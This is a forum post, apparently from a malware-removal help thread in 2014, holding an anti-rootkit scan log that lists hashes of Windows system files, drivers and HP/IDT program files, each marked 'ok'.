12:17:18.0807 0x1aa8 [ ED78427259134C63ED69804D2132B86C, F6F51B8B35881ABCA5580ED111AAC80E466E6474ABAE31EC8BE46C23EDCA77B2 ] C:\Windows\System32\scecli.dll
12:17:18.0807 0x1aa8 C:\Windows\System32\scecli.dll - ok
12:17:18.0810 0x1aa8 [ 7CC7DF5B654DA579613F811D8C637E29, 70EAC059C1ED814810C75DBB9F4D188428CB942FFD8869D692158D384EB6BB35 ] C:\Windows\System32\ubpm.dll
12:17:18.0810 0x1aa8 C:\Windows\System32\ubpm.dll - ok
12:17:18.0814 0x1aa8 [ BD3674BE7FC9D8D3732C83E8499576ED, E6716A5895D629263A4D21959F48840429AB6F4B55A5FA2663EE5E86C9CA2BF1 ] C:\Windows\System32\wtsapi32.dll
12:17:18.0814 0x1aa8 C:\Windows\System32\wtsapi32.dll - ok
12:17:18.0818 0x1aa8 [ F7A256EC899C72B4ECDD2C02CB592EFD, 9C1AA9322E83CABB94AEA4375EAEB0C44700E1F33B8BE98649BA1DF4DDFAD326 ] C:\Windows\System32\bthprops.cpl
12:17:18.0818 0x1aa8 C:\Windows\System32\bthprops.cpl - ok
12:17:18.0822 0x1aa8 [ 4403D5ECE7D8323CAF1207D1AA38FA01, BD0B34DCF658D3CB91C1B55E9E730C5F7C571AFC2BFA09270C377B72B6830D48 ] C:\Windows\System32\credui.dll
12:17:18.0822 0x1aa8 C:\Windows\System32\credui.dll - ok
12:17:18.0825 0x1aa8 [ 1F775DA4CF1A3A1834207E975A72E9D7, 6D3DE5BD3EF3A76E997E5BAF900C51D25308F5A9682D1F62017F577A24095B90 ] C:\Windows\System32\drivers\usbvideo.sys
12:17:18.0825 0x1aa8 C:\Windows\System32\drivers\usbvideo.sys - ok
12:17:18.0828 0x1aa8 [ E424B3EF666B184CEE0B6871AAA8C9F6, D182D9B3A813C75F88CA16A9C236AB6167DF5861D155B5DC016B90918C4BD579 ] C:\Windows\System32\msimg32.dll
12:17:18.0829 0x1aa8 C:\Windows\System32\msimg32.dll - ok
12:17:18.0833 0x1aa8 [ EC6BA7C92FA5B2AA4AFDF4DF22AEDAB7, 690F12C490BEE2BF17AB7B6804E6E9B96F51C304350CCDE80FE5C7EEFA89720E ] C:\Windows\winsxs\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\msvcr80.dll
12:17:18.0833 0x1aa8 C:\Windows\winsxs\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\msvcr80.dll - ok
12:17:18.0837 0x1aa8 [ 7FA8FDC2C2A27817FD0F624E78D3B50C, 7B63F6AA2CD6D4D07EA3C595B868B1A0749BB11620027A2BD9B935E3055481E4 ] C:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32.dll
12:17:18.0837 0x1aa8 C:\Windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32.dll - ok
12:17:18.0841 0x1aa8 [ C78655BC80301D76ED4FEF1C1EA40A7D, 93B2ED4004ED5F7F3039DD7ECBD22C7E4E24B6373B4D9EF8D6E45A179B13A5E8 ] C:\Windows\System32\svchost.exe
12:17:18.0841 0x1aa8 C:\Windows\System32\svchost.exe - ok
12:17:18.0845 0x1aa8 [ 25FBDEF06C4D92815B353F6E792C8129, 57D9764AE6BCE33B242C399CDFC10DD405975BD6411CA8C75FBCD06EEB8442A9 ] C:\Windows\System32\umpnpmgr.dll
12:17:18.0845 0x1aa8 C:\Windows\System32\umpnpmgr.dll - ok
12:17:18.0848 0x1aa8 [ CD1B5AD07E5F7FEF30E055DCC9E96180, 63C58551F32B0B09377F64A6AE1FA81AF93B8A707A57A8C18722086906AD3046 ] C:\Windows\System32\devrtl.dll
12:17:18.0848 0x1aa8 C:\Windows\System32\devrtl.dll - ok
12:17:18.0853 0x1aa8 [ E6EB44ABAAF1F330119F854856C53EBE, 77279972FFBFA984578DD4F17EB615F5D2D93590AF3A9FEFEFDB9128206C9887 ] C:\Windows\System32\SPInf.dll
12:17:18.0853 0x1aa8 C:\Windows\System32\SPInf.dll - ok
12:17:18.0856 0x1aa8 [ 7A17485DC7D8A7AC81321A42CD034519, 88D8705FA901793FC8C1CFD0175E49A6502BF0FC94A066BA573D2FD13AA5F04A ] C:\Windows\System32\userenv.dll
12:17:18.0857 0x1aa8 C:\Windows\System32\userenv.dll - ok
12:17:18.0860 0x1aa8 [ 9C9307C95671AC962F3D6EB3A4A89BAE, D1433791C9B8BCEEAD8937EC18D33E89E4E2012B5975228A8500FD141BC30078 ] C:\Windows\System32\gpapi.dll
12:17:18.0860 0x1aa8 C:\Windows\System32\gpapi.dll - ok
12:17:18.0863 0x1aa8 [ 6BA9D927DDED70BD1A9CADED45F8B184, 66203CE70A5EDE053929A940F38924C6792239CCCE10DD2C1D90D5B4D6748B55 ] C:\Windows\System32\umpo.dll
12:17:18.0864 0x1aa8 C:\Windows\System32\umpo.dll - ok
12:17:18.0867 0x1aa8 [ F6C011B46FAEEF33536B2E80F48B5CBE, BDD149D3D6F9F6C8F6F34C311219BE5618CEEFBC7D35E37473A47F1D5D015067 ] C:\Windows\System32\pcwum.dll
12:17:18.0867 0x1aa8 C:\Windows\System32\pcwum.dll - ok
12:17:18.0871 0x1aa8 [ 716175021BDA290504CE434273F666BC, FA18CA2D8A5F4335E051E2933147D3C1E7308F7D446E2AEB6596CDEF6E2AFC88 ] C:\Windows\System32\powrprof.dll
12:17:18.0871 0x1aa8 C:\Windows\System32\powrprof.dll - ok
12:17:18.0873 0x1aa8 [ 43D0F98E1D56CCDDB0D5254CFF7B356E, 5BA498183B5C4996C694CB0A9A6B66CE6C7A460F6C91BEB9F305486FCC3B7B22 ] C:\Windows\System32\drivers\luafv.sys
12:17:18.0873 0x1aa8 C:\Windows\System32\drivers\luafv.sys - ok
12:17:18.0877 0x1aa8 [ F80BDC0D9E7B9595E74B434446AD3781, 383EC0F485D3E12D198343A0AD7BEEECFD2A569E73672345964CED38CAF34D83 ] C:\Program Files (x86)\HP SimplePass 2012\TrueSuiteService.exe
12:17:18.0877 0x1aa8 C:\Program Files (x86)\HP SimplePass 2012\TrueSuiteService.exe - ok
12:17:18.0881 0x1aa8 [ A2B0924D50F4435FD389499047CE553A, 8D16D5CAAD71AAAAA1479F8477D2928B66581C79932A49A21EDF93DB2803AB9C ] C:\Windows\SysWOW64\ntdll.dll
12:17:18.0881 0x1aa8 C:\Windows\SysWOW64\ntdll.dll - ok
12:17:18.0884 0x1aa8 [ 2A107B611C91CD256466C58C0D776E9D, 58EA4F6E0FE7EFB8D3024AE71EE16848C2A00BA5224C8054C80134F99D9A72AB ] C:\Windows\System32\wow64.dll
12:17:18.0885 0x1aa8 C:\Windows\System32\wow64.dll - ok
12:17:18.0888 0x1aa8 [ 0F090A77E664CB0F70AB8D3B230B760C, A08EA0409B3BF88AB12792F721FA3A692BBE640DF2A06641E142843A7044EC5E ] C:\Windows\System32\wow64cpu.dll
12:17:18.0889 0x1aa8 C:\Windows\System32\wow64cpu.dll - ok
12:17:18.0892 0x1aa8 [ 7434E01FBCA3CB86539C39412A31D5E1, E40D5AEBB3A5D8F53C76E3FBF0C07B9C0227914C869F57622EA44A212383EE6D ] C:\Windows\System32\wow64win.dll
12:17:18.0892 0x1aa8 C:\Windows\System32\wow64win.dll - ok
12:17:18.0895 0x1aa8 [ 76161B9D78A275F8F28DD67436013110, E4AE9648BDED9035D39DF20C3A6F453F67D49D7899038B21D88FFD4EFFCC4C08 ] C:\Windows\SysWOW64\kernel32.dll
12:17:18.0895 0x1aa8 C:\Windows\SysWOW64\kernel32.dll - ok
12:17:18.0899 0x1aa8 [ 09A19C806110CE839111850EC27E65F5, 828251F2183AA42F9556F820025A612CDC52E57424C10738F7A4640CAB7E06E7 ] C:\Windows\System32\drivers\bcbtums.sys
12:17:18.0899 0x1aa8 C:\Windows\System32\drivers\bcbtums.sys - ok
12:17:18.0903 0x1aa8 [ 0E78584D5FACA0509DFA97BD8B635075, 5362BF3A7237361C4ACA64946BBA61F7C79737FFC35CC8E042A45CB9BE15132F ] C:\Windows\System32\drivers\btwampfl.sys
12:17:18.0903 0x1aa8 C:\Windows\System32\drivers\btwampfl.sys - ok
12:17:18.0907 0x1aa8 [ 856E76B3641746ABBC2946BED1372098, FD93CC7F72560F72CA49AD5609C079E25B8A3A4802E72B127B63A9E7B4884710 ] C:\Windows\System32\drivers\hidparse.sys
12:17:18.0907 0x1aa8 C:\Windows\System32\drivers\hidparse.sys - ok
12:17:18.0910 0x1aa8 [ 461B713DE7F353C6447B744F1A049930, 3551C57128DAFA009C9DB3EE0D798D94B269D1605F74897566D7E79E5FDD437B ] C:\Windows\SysWOW64\KernelBase.dll
12:17:18.0910 0x1aa8 C:\Windows\SysWOW64\KernelBase.dll - ok
12:17:18.0914 0x1aa8 [ 9DC80A8AAAAAC397BDAB3C67165A824E, 051636BFDFF7AB0E4191354E846BD0DACCA1A01FCC13C1AFED91D8DBFE17127A ] C:\Windows\SysWOW64\msvcrt.dll
12:17:18.0914 0x1aa8 C:\Windows\SysWOW64\msvcrt.dll - ok
12:17:18.0917 0x1aa8 [ 6A6B2EE4565A178035BE2A4FF6F2C968, E2E231F1C2E2CE19583483ACC53318651FA7CA2DE46BCB89B4CBF97CA0525122 ] C:\Windows\SysWOW64\wtsapi32.dll
12:17:18.0917 0x1aa8 C:\Windows\SysWOW64\wtsapi32.dll - ok
12:17:18.0922 0x1aa8 [ 738D0E9272F59EB7A1449C3EC118E6C4, FE3D32C2A5E4DC21376A0F89C0B2EE024ECF1A3FB99213CC9BBC986ADF7AF080 ] C:\Windows\System32\drivers\bthport.sys
12:17:18.0922 0x1aa8 C:\Windows\System32\drivers\bthport.sys - ok
12:17:18.0926 0x1aa8 [ D15618A0FF8DBC2C5BF3726BACC75A0B, ADD81EA1D208907D67802F0E96EC0327BA89021F870BA22B9C7E3A19013A6AE7 ] C:\Windows\SysWOW64\userenv.dll
12:17:18.0926 0x1aa8 C:\Windows\SysWOW64\userenv.dll - ok
12:17:18.0930 0x1aa8 [ 4DC999CED9429939D75682EBD7D48901, 4E2DB6E4C500980488010AF1125A73D0F958889379F05DB304A220B4BB2D1834 ] C:\Windows\SysWOW64\rpcrt4.dll
12:17:18.0930 0x1aa8 C:\Windows\SysWOW64\rpcrt4.dll - ok
12:17:18.0933 0x1aa8 [ F188B7394D81010767B6DF3178519A37, 576304E92FD94908F093A6AB5F4D328F25829BE32EC3CA0D29EBFDF5DE83539B ] C:\Windows\System32\drivers\BTHUSB.SYS
12:17:18.0933 0x1aa8 C:\Windows\System32\drivers\BTHUSB.SYS - ok
12:17:18.0937 0x1aa8 [ F08F6FCD09F9BE94C37ACC1B344685FF, DE48D766258B46EFEAB16579421C4BD97ACC6883F782D00E9857F4A0CE7E8A34 ] C:\Windows\SysWOW64\cryptbase.dll
12:17:18.0937 0x1aa8 C:\Windows\SysWOW64\cryptbase.dll - ok
12:17:18.0942 0x1aa8 [ CFC97F07904067A1E5FAE195D534DA3A, EB4D2D127312EB09E2ACCA3276779E80F90FAF77322684BABF72B8EC6E1F906C ] C:\Windows\SysWOW64\sechost.dll
12:17:18.0942 0x1aa8 C:\Windows\SysWOW64\sechost.dll - ok
12:17:18.0945 0x1aa8 [ 75878492F2B33405EEF900F8C16C6D08, E38B3B58C3C6895F9CBA28E8BD4C6497D07342FD9CA4BBAE6AFC48D40DC11FA1 ] C:\Windows\SysWOW64\sspicli.dll
12:17:18.0945 0x1aa8 C:\Windows\SysWOW64\sspicli.dll - ok
12:17:18.0949 0x1aa8 [ 529F85BC70CC73A7B3E99953AB711197, 40A218035F73B4AA110E18BF95FB1D04F64F7FD58CBE6E3BDA7D98A9BC44C919 ] C:\Program Files (x86)\HP SimplePass 2012\TSLog.dll
12:17:18.0949 0x1aa8 C:\Program Files (x86)\HP SimplePass 2012\TSLog.dll - ok
12:17:18.0953 0x1aa8 [ C733D233B623B7FFCE5031E4B756EE26, 33CC8B140B0E4A9B702E3468BE2646AEE4273F20C6EA5BAC6C3D8FC8EDEF0881 ] C:\Windows\SysWOW64\profapi.dll
12:17:18.0953 0x1aa8 C:\Windows\SysWOW64\profapi.dll - ok
12:17:18.0957 0x1aa8 [ 5E0DB2D8B2750543CD2EBB9EA8E6CDD3, 01EB95FA3943CF3C6B1A21E473A5C3CB9FCBCE46913B15C96CAC14E4F04075B4 ] C:\Windows\SysWOW64\user32.dll
12:17:18.0957 0x1aa8 C:\Windows\SysWOW64\user32.dll - ok
12:17:18.0960 0x1aa8 [ 56E3313690866F99CD17AA1342F64AE1, 4AD4E105C1A6E9BAB9568CA21B15A38C59702EF605AA9058490C56DA070CF846 ] C:\Windows\SysWOW64\gdi32.dll
12:17:18.0960 0x1aa8 C:\Windows\SysWOW64\gdi32.dll - ok
12:17:18.0964 0x1aa8 [ CC23295DA8F7B5C53F93804D2F5D30EB, B290D96C40FBA934DE6CFF82D9BBA6780922CC5012C61599BD5006DAEDC82DDB ] C:\Windows\SysWOW64\lpk.dll
12:17:18.0964 0x1aa8 C:\Windows\SysWOW64\lpk.dll - ok
12:17:18.0967 0x1aa8 [ B7230010D97787AF3D25E4C82F2B06B9, C795E9811CD461F8E98D1738667EB0C265A57065EA3420CE596D5038E7430C1E ] C:\Windows\SysWOW64\usp10.dll
12:17:18.0967 0x1aa8 C:\Windows\SysWOW64\usp10.dll - ok
12:17:18.0971 0x1aa8 [ D67472125471784DE7147946EDA25FEB, F41960118F412B6CA5E80AE5E8DB9AECDD043A7DB34388FF57C6F9C5A0056F91 ] C:\Windows\SysWOW64\advapi32.dll
12:17:18.0971 0x1aa8 C:\Windows\SysWOW64\advapi32.dll - ok
12:17:18.0975 0x1aa8 [ E9D88493FBDB36D4B65C6F2F7F122C95, 226B05B57C1F509A48C7EC22B71E60202AC34995ECA50075EE16B87EAC366BF5 ] C:\Windows\SysWOW64\shell32.dll
12:17:18.0975 0x1aa8 C:\Windows\SysWOW64\shell32.dll - ok
12:17:18.0978 0x1aa8 [ CF98190A94F62E405C8CB255018B2315, E1B2540023C4FE9FD588E4B6AE6347DFA565EB3898F21E5360882BF3E8B5E781 ] C:\Windows\System32\drivers\bthenum.sys
12:17:18.0978 0x1aa8 C:\Windows\System32\drivers\bthenum.sys - ok
12:17:18.0982 0x1aa8 [ 3DD798846E2C28102B922C56E71B7932, 30B111615D74CB2213997A5C08DD9C8613ADE441D9423CC1C49A753D13CE524D ] C:\Windows\System32\drivers\rfcomm.sys
12:17:18.0982 0x1aa8 C:\Windows\System32\drivers\rfcomm.sys - ok
12:17:18.0985 0x1aa8 [ 8CA7CABD13316ABACE386D9F380B4CF3, 6BB8142760E3440543991A6C2A2B5CB7450E7936C9A9F9038622AAC0D79C7667 ] C:\Windows\System32\drivers\btwavdt.sys
12:17:18.0985 0x1aa8 C:\Windows\System32\drivers\btwavdt.sys - ok
12:17:18.0989 0x1aa8 [ 409C4117E6027672EF41E68ACE1468AD, 8FB0A11E5147EEB245527E68FCD8FEC4BF5DC820BA1F99F983CDA10829DB4F5D ] C:\Windows\System32\drivers\btwaudio.sys
12:17:18.0989 0x1aa8 C:\Windows\System32\drivers\btwaudio.sys - ok


----------



## raphael100 (May 24, 2014)

12:17:18.0993 0x1aa8 [ 41933521A618475644B6E8D8487AF326, A50D6CF096E45E4EA2491D61CFE165C8C8A8956E699519C4314918DE1FD31056 ] C:\Windows\System32\drivers\btwdpan.sys
12:17:18.0993 0x1aa8 C:\Windows\System32\drivers\btwdpan.sys - ok
12:17:18.0997 0x1aa8 [ B9354F9F111C64F2495B60F1E24CB453, 67B3F5867B00F84832EF5AD649D817D27B3F200351C7C53579A63D30F8E2BFDD ] C:\Windows\System32\drivers\btwl2cap.sys
12:17:18.0997 0x1aa8 C:\Windows\System32\drivers\btwl2cap.sys - ok
12:17:19.0000 0x1aa8 [ 71A04F2D9DEB21B162561EB574D7D629, C4E477F38CA3C76A966DA9145ABA55EE316BDEC84FE647DB06BCB1604EFE1A94 ] C:\Windows\System32\drivers\btwrchid.sys
12:17:19.0000 0x1aa8 C:\Windows\System32\drivers\btwrchid.sys - ok
12:17:19.0003 0x1aa8 [ 597C3699384E53CC59587ED50CCE5CA2, 4F61E9B5BEB3BD1634D733983381E516664BD7E250DF4B0150B168E05EFD652A ] C:\Windows\System32\drivers\hidclass.sys
12:17:19.0004 0x1aa8 C:\Windows\System32\drivers\hidclass.sys - ok
12:17:19.0007 0x1aa8 [ 8CC3C111D653E96F3EA1590891491D71, 1D326D7D116D76876EE2B14A5BFB7B4328E21DB9B5AAAB9CB67F8EFB93924230 ] C:\Windows\SysWOW64\shlwapi.dll
12:17:19.0007 0x1aa8 C:\Windows\SysWOW64\shlwapi.dll - ok
12:17:19.0011 0x1aa8 [ 9E4B0E7472B4CEBA9E17F440B8CB0AB8, B1A9B2EF000917214C0198958CBD239D1D91B1720EC40DF041262A34D302AD74 ] C:\Windows\SysWOW64\winspool.drv
12:17:19.0011 0x1aa8 C:\Windows\SysWOW64\winspool.drv - ok
12:17:19.0014 0x1aa8 [ 928CF7268086631F54C3D8E17238C6DD, F058FAFB04E7EBD5CADE9B48195B7AA7C3508F332A89F5E6E5F3F071E8CADD4A ] C:\Windows\SysWOW64\ole32.dll
12:17:19.0014 0x1aa8 C:\Windows\SysWOW64\ole32.dll - ok
12:17:19.0018 0x1aa8 [ 6C765E82B57F2E66CE9C54AC238471D9, 97F410023F5C08B4BC5DBF89A642200E76F4025ADD9707C24FD89D673675BB43 ] C:\Windows\SysWOW64\oleaut32.dll
12:17:19.0018 0x1aa8 C:\Windows\SysWOW64\oleaut32.dll - ok
12:17:19.0021 0x1aa8 [ A6F09E5669D9A19035F6D942CAA15882, 68C8AF0CC1923E3A7245392F2480EE665D265DF300A609D2540BF7C6D9C1A1BE ] C:\Windows\SysWOW64\imm32.dll
12:17:19.0021 0x1aa8 C:\Windows\SysWOW64\imm32.dll - ok
12:17:19.0025 0x1aa8 [ C9618BC9B2B0FD7C1138D8774795A79B, 0AC170669C2626519FA7A745C56BFBA6B83B8537488F5B9EB7BA72448E5E7A43 ] C:\Windows\SysWOW64\msctf.dll
12:17:19.0025 0x1aa8 C:\Windows\SysWOW64\msctf.dll - ok
12:17:19.0029 0x1aa8 [ 8E01332CC4B68BC6B5B7EFFE374442AA, A4AD1D2FD3EC2F26949DBBC388F9FFF3713AD7EB4E9220AF817EBB5223E467C6 ] C:\Windows\SysWOW64\oleacc.dll
12:17:19.0029 0x1aa8 C:\Windows\SysWOW64\oleacc.dll - ok
12:17:19.0032 0x1aa8 [ 3FD15B4611D9BDA3F8013548C0ECAECA, B47A8D9985D9B71EB870816A0AB2B6403D394CCBDF7DE5378D5721D58D68D28D ] C:\Windows\SysWOW64\ntmarta.dll
12:17:19.0032 0x1aa8 C:\Windows\SysWOW64\ntmarta.dll - ok
12:17:19.0036 0x1aa8 [ A8BB45F9ECAD993461E0FEF8E2A99152, ACB756EA54E71F124D928829666B5B439785593877FF7C0C76ADCF954F4E6C94 ] C:\Windows\SysWOW64\Wldap32.dll
12:17:19.0036 0x1aa8 C:\Windows\SysWOW64\Wldap32.dll - ok
12:17:19.0039 0x1aa8 [ 2575511AF67AA1FA068CCC4918E2C2A3, 3152FF5AC2CF6FE966DA59B1B33E22F9BD9B6BB4310441870528364BA9501A4D ] C:\Windows\System32\drivers\Sftvollh.sys
12:17:19.0039 0x1aa8 C:\Windows\System32\drivers\Sftvollh.sys - ok
12:17:19.0043 0x1aa8 [ 5C627D1B1138676C0A7AB2C2C190D123, C5003F2C912C5CA990E634818D3B4FD72F871900AF2948BD6C4D6400B354B401 ] C:\Windows\System32\rpcss.dll
12:17:19.0043 0x1aa8 C:\Windows\System32\rpcss.dll - ok
12:17:19.0047 0x1aa8 [ 418E881201583A3039D81F43E39E6C78, C96AAC161E09BE12815A4E931E65F66DB1A456C03253EF1111AE66F44B1515FF ] C:\Windows\SysWOW64\winsta.dll
12:17:19.0047 0x1aa8 C:\Windows\SysWOW64\winsta.dll - ok
12:17:19.0050 0x1aa8 [ E4DC58CF7B3EA515AE917FF0D402A7BB, 665B5CD9FE905B0EE3F59A7B1A94760F5393EBEE729877D8584349754C2867E8 ] C:\Windows\System32\RpcEpMap.dll
12:17:19.0050 0x1aa8 C:\Windows\System32\RpcEpMap.dll - ok
12:17:19.0054 0x1aa8 [ 31559F3244C6BC00A52030CAA83B6B91, B2025742B5F0025ACE9821D5722DE3F997EEEAB21D2F381C9E307882DF422579 ] C:\Windows\System32\WSHTCPIP.DLL
12:17:19.0054 0x1aa8 C:\Windows\System32\WSHTCPIP.DLL - ok
12:17:19.0057 0x1aa8 [ 9AD9E06F8656F296D91FAE8EE5B95A27, 53384747D5864D699BCC4F48E0A5E656430EDAA65DCDAB4B11EA68FC7106459E ] C:\Windows\System32\FirewallAPI.dll
12:17:19.0058 0x1aa8 C:\Windows\System32\FirewallAPI.dll - ok
12:17:19.0062 0x1aa8 [ 16E964ABF6D1E0F0CC7822FCA9BA754D, 0E461387ACFD641DA22EE542A3C68AF5F7D3A7F967D974E3B198143D461ABE39 ] C:\Windows\System32\wshqos.dll
12:17:19.0062 0x1aa8 C:\Windows\System32\wshqos.dll - ok
12:17:19.0065 0x1aa8 [ 715F03B4C7223349768013EA95D9E5B7, 09AB0535A54C2E2962F0FD06988D99060F8CECA39B07AC00A63204C773B95893 ] C:\Windows\System32\LogonUI.exe
12:17:19.0065 0x1aa8 C:\Windows\System32\LogonUI.exe - ok
12:17:19.0068 0x1aa8 [ 34152997FB906895290E0199AC94B85F, 6AEEB989FA6E4354F96F70D0169CC6CAAA56EEE3056F1CD20F5FE846EAC058C1 ] C:\Windows\System32\authui.dll
12:17:19.0069 0x1aa8 C:\Windows\System32\authui.dll - ok
12:17:19.0072 0x1aa8 [ 94E026870A55AAEAFF7853C1754091E9, B2F5D5629D12BDFA98DBED3898368F37D9009C7531B6909C7285A2C11C9A0F93 ] C:\Windows\System32\version.dll
12:17:19.0072 0x1aa8 C:\Windows\System32\version.dll - ok
12:17:19.0076 0x1aa8 [ 6011714C8C5C55CBFFAD24D61E879FBD, 75D615082A1C71C6ED3ABB49EDAF660EE538D112CF79B9C8AF0A583D1CE1BBB0 ] C:\Windows\System32\wevtsvc.dll
12:17:19.0076 0x1aa8 C:\Windows\System32\wevtsvc.dll - ok
12:17:19.0080 0x1aa8 [ B3BFBD758506ECB50C5804AAA76318F9, 34E079A6AB2D41D1E0B3887B6AE31C43941061B7176FFF2801C3F465C2C89578 ] C:\Windows\System32\cryptui.dll
12:17:19.0080 0x1aa8 C:\Windows\System32\cryptui.dll - ok
12:17:19.0083 0x1aa8 [ 53E83F1F6CF9D62F32801CF66D8352A8, 1225FED810BE8E0729EEAE5B340035CCBB9BACD3EF247834400F9B72D05ACE48 ] C:\Windows\System32\profsvc.dll
12:17:19.0083 0x1aa8 C:\Windows\System32\profsvc.dll - ok
12:17:19.0087 0x1aa8 [ 43D808F5D9E1A18E5EEB5EBC83969E4E, C10D1155D71EABE4ED44C656A8F13078A8A4E850C4A8FBB92D52D173430972B8 ] C:\Windows\System32\dhcpcore.dll
12:17:19.0087 0x1aa8 C:\Windows\System32\dhcpcore.dll - ok
12:17:19.0090 0x1aa8 [ 588CD0C78A7FAAE4186B5EEA0AF3ED67, E957E4463D318A44BA5109EE3428624DE901C5FF2BA358986DF6C6F059DDBCC2 ] C:\Windows\System32\adtschema.dll
12:17:19.0090 0x1aa8 C:\Windows\System32\adtschema.dll - ok
12:17:19.0094 0x1aa8 [ F23FEF6D569FCE88671949894A8BECF1, FCE7B156ED663471CF9A736915F00302E93B50FC647563D235313A37FCE8F0F6 ] C:\Windows\System32\audiosrv.dll
12:17:19.0094 0x1aa8 C:\Windows\System32\audiosrv.dll - ok
12:17:19.0098 0x1aa8 [ 4E9C2DB10F7E6AE91BF761139D4B745B, 8F63F78294F5585D599A114AF449DCC447CCB239D0F0B490BFE6B34A2146E730 ] C:\Windows\System32\shacct.dll
12:17:19.0098 0x1aa8 C:\Windows\System32\shacct.dll - ok
12:17:19.0101 0x1aa8 [ C4C183E6551084039EC862DA1C945E3D, 0874A2ACDD24D64965AA9A76E9C818E216880AE4C9A2E07ED932EE404585CEE6 ] C:\Windows\System32\FntCache.dll
12:17:19.0102 0x1aa8 C:\Windows\System32\FntCache.dll - ok
12:17:19.0105 0x1aa8 [ 5B3EBFC3DA142324B388DDCC4465E1FF, 5D58642305311F9BC9B779C9598BFC4E7433B3EA58404BF1FF9466838A2328C7 ] C:\Windows\System32\samlib.dll
12:17:19.0105 0x1aa8 C:\Windows\System32\samlib.dll - ok
12:17:19.0109 0x1aa8 [ C155C5347D546A3CC859071BB7342899, CD7AA2B4C3181DEDF37ACA306F2A73639F3077BF44220FCB839E1B0D61802D9B ] C:\Program Files\IDT\WDM\stacsv64.exe
12:17:19.0109 0x1aa8 C:\Program Files\IDT\WDM\stacsv64.exe - ok
12:17:19.0112 0x1aa8 [ 78A1E65207484B7F8D3217507745F47C, 35F413ADB9D157F3666DD15DD58104D629CD9143198A1AB914B73A4A3C9903DD ] C:\Windows\System32\avrt.dll
12:17:19.0112 0x1aa8 C:\Windows\System32\avrt.dll - ok
12:17:19.0116 0x1aa8 [ E40E80D0304A73E8D269F7141D77250B, 0DB4AC13A264F19A84DC0BCED54E8E404014CC09C993B172002B1561EC7E265A ] C:\Windows\System32\mmcss.dll
12:17:19.0116 0x1aa8 C:\Windows\System32\mmcss.dll - ok
12:17:19.0120 0x1aa8 [ 227E2C382A1E02F8D4965E664D3BBE43, 1CFF20A8BF87ACE4FA4935EBEED72BFB1A1FE902A754899E2F50798D67DF5642 ] C:\Windows\System32\MMDevAPI.dll
12:17:19.0120 0x1aa8 C:\Windows\System32\MMDevAPI.dll - ok
12:17:19.0123 0x1aa8 [ 54FFC9C8898113ACE189D4AA7199D2C1, 65F585C87F3F710FD5793FDFA96B740AD8D4317B0C120F4435CCF777300EA4F2 ] C:\Windows\System32\MPSSVC.dll
12:17:19.0123 0x1aa8 C:\Windows\System32\MPSSVC.dll - ok
12:17:19.0125 0x1aa8 [ F06BB4E336EA57511FDBAFAFCC47DE62, BE43EC62548E9FF89A9495A1722E22DBB76EEC3764F86E64057B636F27D15765 ] C:\Windows\System32\propsys.dll
12:17:19.0126 0x1aa8 C:\Windows\System32\propsys.dll - ok
12:17:19.0129 0x1aa8 [ 58775492FFD419248B08325E583C527F, DBB013971F5894F25C222C2D4D50A29DB6DF3C413792EE9CCC1A9E6D85469093 ] C:\Windows\System32\atl.dll
12:17:19.0129 0x1aa8 C:\Windows\System32\atl.dll - ok
12:17:19.0133 0x1aa8 [ 9110FFAD124283F37D38771BB60556AF, BB495FDF86B7C3DD7878C496090A624CE8FE68F61166C91A4C99EF1140F0AD23 ] C:\Windows\System32\dsound.dll
12:17:19.0133 0x1aa8 C:\Windows\System32\dsound.dll - ok
12:17:19.0136 0x1aa8 [ 46863C4CC5B68EB09EA2D5EEF0F1193A, 9B5593E1F484AC8F96F89A5995FB1FE9C51CB2F0F545607F6850751191150CFE ] C:\Windows\System32\radardt.dll
12:17:19.0136 0x1aa8 C:\Windows\System32\radardt.dll - ok
12:17:19.0139 0x1aa8 [ D29E998E8277666982B4F0303BF4E7AF, 4F19AB5DC173E278EBE45832F6CEAA40E2DF6A2EDDC81B2828122442FE5D376C ] C:\Windows\System32\uxtheme.dll
12:17:19.0139 0x1aa8 C:\Windows\System32\uxtheme.dll - ok
12:17:19.0143 0x1aa8 [ 5F28111C648F1E24F7DBC87CDEB091B8, 2E8645285921EDB98BB2173E11E57459C888D52E80D85791D169C869DE8813B9 ] C:\Windows\System32\netprofm.dll
12:17:19.0143 0x1aa8 C:\Windows\System32\netprofm.dll - ok
12:17:19.0147 0x1aa8 [ EF2AE43BCD46ABB13FC3E5B2B1935C73, 81FC06F306F620845D7DD8D06E706309E70BC89B589C81F3478302A3F5F73431 ] C:\Windows\System32\winmm.dll
12:17:19.0147 0x1aa8 C:\Windows\System32\winmm.dll - ok
12:17:19.0151 0x1aa8 [ 18CAAF21CBA3EAEE17BBA5D3807F29B8, 59C4FE015CCBE922F7AB3838D7F34CACC08DD437B2BAD62926BF4A9C416F7C19 ] C:\Windows\winsxs\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.18120_none_2b25b14c71ebf230\GdiPlus.dll
12:17:19.0151 0x1aa8 C:\Windows\winsxs\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.18120_none_2b25b14c71ebf230\GdiPlus.dll - ok
12:17:19.0154 0x1aa8 [ 62B4B3FCF5C4E6E2D9484391AFBB385A, 7E5E5A9A98A699C4D2A96AA9DE75CC70711DFC6109BB885E4B219EBA12D19E87 ] C:\Windows\System32\stapi64.dll
12:17:19.0155 0x1aa8 C:\Windows\System32\stapi64.dll - ok
12:17:19.0158 0x1aa8 [ 4FADA86E62F18A1B2F42BA18AE24E6AA, CE1683386886BF34862681A46199EA7E7FB4232A186047DA7FBD8EC240AF6726 ] C:\Windows\System32\wlansvc.dll
12:17:19.0158 0x1aa8 C:\Windows\System32\wlansvc.dll - ok
12:17:19.0161 0x1aa8 [ D5CCA1453B98A5801E6D5FF0FF89DC6C, 85F2C2480AAC31B6092187B431A562D79D4CFB1324F925C85055ABAB2483264B ] C:\Windows\System32\audiodg.exe
12:17:19.0161 0x1aa8 C:\Windows\System32\audiodg.exe - ok
